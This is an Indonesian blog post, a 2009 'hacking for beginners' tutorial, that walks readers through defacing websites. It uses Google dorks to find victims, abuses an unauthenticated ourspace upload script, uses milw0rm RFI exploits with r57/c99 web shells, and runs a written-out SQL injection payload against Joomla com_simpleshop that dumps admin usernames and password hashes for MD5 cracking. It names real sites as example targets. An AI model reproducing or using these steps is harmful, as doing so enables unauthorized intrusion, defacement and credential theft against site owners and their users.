shoutbox

Share Link

http://yusuf-facrony.uni.cc Mari saling tukar menukar link.. silahkan copy kode diatas, saya juga akan link balik anda, thanks
Rabu, 29 April 2009

postheadericon Tutor Hacking Buat Pemula

11.54 | Diposting oleh Yusuf Fachroni | | Edit Entri

Ok, di posting saya kali ini, saya akan mengulas bagaimana cara untuk hacking website dan mendefacex untuk para pemula, jadi kita cukup menggunakan dork aja,,

pertama2 buka milw0rm,


Contoh target adalaha ourspace 2.0
pertama cuba buka milw0rm trus klik search, lalu ketik RFI, FILE atau SQL. Disini kita ambil bug
http://www.milw0rm.com/exploits/4343.

1. Buka google, trus ketik allinurl:"/cgi-bin/ourspace/ pada search enginenya.

2. Setelah itu cari situs yang mau di cuba
misalnya neh :
Code:
http://www.2coolcode.com/cgi-bin/ourspace//login.cgi

3. Hapus /cgi-bin/ourspace//login.cgi ganti dengan
Code:
/cgi-bin/ourspace/newswire/uploadmedia.cgi

4. Setelah itu muncul upload files

5. Lu bikin html yang bagus terus upload dah...


Hacking RFI (Remote File Inclusion)
---------------------------------
1. Buka google lalu ketik "Php Blue Dragon"
2. Setelah itu cari situs yang mau dicoba
Contohnya : http://www.komix91.ovh.org. Bugnya cari aja di http://www.milw0rm.com
trus ketik PHP BLUE DRAGON. Hasil dari serach pada milw0rm.
Code:
- http://milw0rm.com/exploits/1779
- http://milw0rm.com/exploits/1913
- http://milw0rm.com/exploits/4276

selanjutnya kalian coba aja sendiri ya. Jangan lupa gunakan shell (r57, c99, dll)

3. Selamat mencoba !

SQL Injection
--------------
Seperti biasa kita membuka site milw0rm untuk melihat bug SQL
contoh BUG SQL http://www.milw0rm.com/exploits/5177

1. Buka google trus ketik allinurl:"com_simpleshop" atau allinurl: "com_simpleshop"section disamping kiri ini berupa dork untuk mencari bug sql pada web.

2. kalau kita telah mendapatnya sekarang kita injeck. Contoh :

Code:
http://www.target.com/index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section&section=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*


3. Kalau ada hasilnya, silakan deskripsi password adminnya menggunakan tools MD5 crack, bisa menggunakan ini http://thesoftwareengineer.org/services/md5.php

4. Selamat Mencuba

NB: Segala tindakan yang anda lakukan bukanlah tanggung jawab kami, this is just for education..
Label:

0 komentar:

Posting Komentar
Langganan: Posting Komentar (Atom)

copyright by Ahmed Yusuf .